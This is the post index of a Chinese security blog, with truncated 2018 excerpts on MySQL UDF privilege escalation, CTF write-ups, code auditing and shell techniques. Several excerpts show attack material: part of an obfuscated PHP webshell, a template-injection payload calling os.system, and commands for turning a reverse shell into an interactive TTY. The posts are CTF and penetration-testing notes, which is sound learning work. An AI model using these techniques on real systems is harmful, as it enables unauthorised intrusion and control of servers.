MoR03r MoR03r's Blog
Mysql udf提权
发表于 2018-12-2 | exploit
UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限 网上有些文章利用的是sqlmap-master\udf\mysql\linux\64的libmysqludf_sys.so文件,但是测试中发现会报错 mysql> create function sys_eval returns string soname 'udf.so'; ERROR 1126 (HY000): Can't open shared library 'udf.so' (errno:...

阅读全文>>

湖湘杯Common Crypto
发表于 2018-11-21 | CTF
扔入IDA进行分析: 获得关键字符串8aeb45c62003ba52e46c9600b3699b8c30386334623434393136633963356136 继续分析程序逻辑,从sbox可以发现这个程序其实是一个AES加密拼接字符串,刚才这段是密文和字符串拼接体,只需要找到密钥就能解决: 找到密钥后,写脚本解决:

阅读全文>>

发现一个小马的利用方式
发表于 2018-10-25 | 综合
先贴代码吧 <?php $k = @$_SERVER["HTTP_DNT"]; $d = $p = ''; foreach ($_POST as $a => $b) $d.= $b; $t = eccode($d, 'DECODE', $k); $t = gzuncompress($t); $p = unserialize($t); $_POST = $p; $_POST['z0'] = base64_encode(preg_replace('/(\W){1}die\(\);$/', '\1...

阅读全文>>

护网杯ltshop题目记录
发表于 2018-10-25 | CTF
首先看一下题目首页,常规检查一遍,什么都没有发现 然后注册用户,登录查看一番 经过一番测试,发现购买大辣条的地方存在一点点的条件竞争,可以购买到5包或以上的辣条 用burp抓包,发送到intruder模块直接多线程跑即可得到 成功购买到5包以上辣条,然后在兑换辣条之王的位置进行整数溢出 测试结果是0xffff ffff ffff ffff转十进制后,先除以5然后再加1 这里的后端逻辑可能是5包大辣条换一包辣条之王,然后提交x份,那么就需要5x包辣条,但是...

阅读全文>>

国赛半决赛(华北赛区)Web7题目解题分享
发表于 2018-10-14 | CTF
Web7解题思路 MoR03r解题思路(非预期) 打开网站后,注册一个用户登录,发现“咸鱼”这里有个上传 上传一张图片看看效果,发现会跳转到/user这个页面 比赛时,队友找到了一个非预期,就是上传的文件名可以包含路径,直接覆盖原文件 利用这个非预期上传到/home/ciscn/www/sshop/template/info.html,直接覆盖info.html这个模板,在info.html中加入一句 {% import os %}{{ os.system('ls > /home/ciscn...

阅读全文>>

cmd下查询3389远程桌面端口
发表于 2018-9-28 | 综合
cmd下查询3389远程桌面端口 因为要经常用到,在博客中做个笔记 在命令行下执行 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 返回: 其中的0xd3d即为端口,转为十进制: Windows下可以用计算器:

阅读全文>>

反弹一个TTY Shell
发表于 2018-9-7 | 综合
通常在webshell中反弹一个shell到主机或VPS中,产生的shell并不是tty(交互式)shell 此时我们无法通过输入su命令来切换用户,故有此文 Python python -c 'import pty; pty.spawn("/bin/sh")' 下面的方式未验证成功,Python中没有echo,如果去掉echo保存到py文件中可以成功 echo os.system('/bin/bash') Bash /bin/sh -i Perl 直接执行 perl -e 'exec "/b...

阅读全文>>

一个CTF题目的小结-无字母数字getFlag
发表于 2018-8-12 | CTF
前段时间看了一个比赛,题目应该算是比较旧的了 <?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>50){ die("Long."); } $a = preg_match("/[A-Za-z0-9_]+/",$code); print_r($a); ...

阅读全文>>

新秀(sinsiu)cms代码审计小计
发表于 2018-7-20 | 综合
sinsiu PHP 1.0 final 不多说,先上了Seay源代码审计系统,查看了一些东西 然后跟了一下,在admin/module/file/deal.php 第69~71行这里发现没有对数据以及文件名进行任何过滤 跟进post函数,位置为include/function.php 第198~201行,从上一步获取两个参数,第二个参数没有使用默认的strict,而是no_filter function post($val,$filter = 'strict') { return $filter(isset($_POS...

阅读全文>>

国赛2018 部分题目writeup
发表于 2018-5-2 | CTF
0x01 EASYWEB 前面做题的时候一直发现这个题不能注入,后来在登录页面随手试了admin和空口令登录,抓包发现会自动填充密码,把密码去掉拿到flag。 0x02 验证码 刚开始放出这个题目的时候是点击图片的验证码,随手点了几个等成绩刷新便拿到了flag。在放出验证码2后发现,这个题目竟然改过了。最终的flag: 0x03 picture 1.首先得到一张jpg图片,丢到binwalk里看到隐藏数据,直接使用-e参数解压出来下面的base64: S1ADBBQAAQAAADkwl0xs4x98...

阅读全文>>

TOP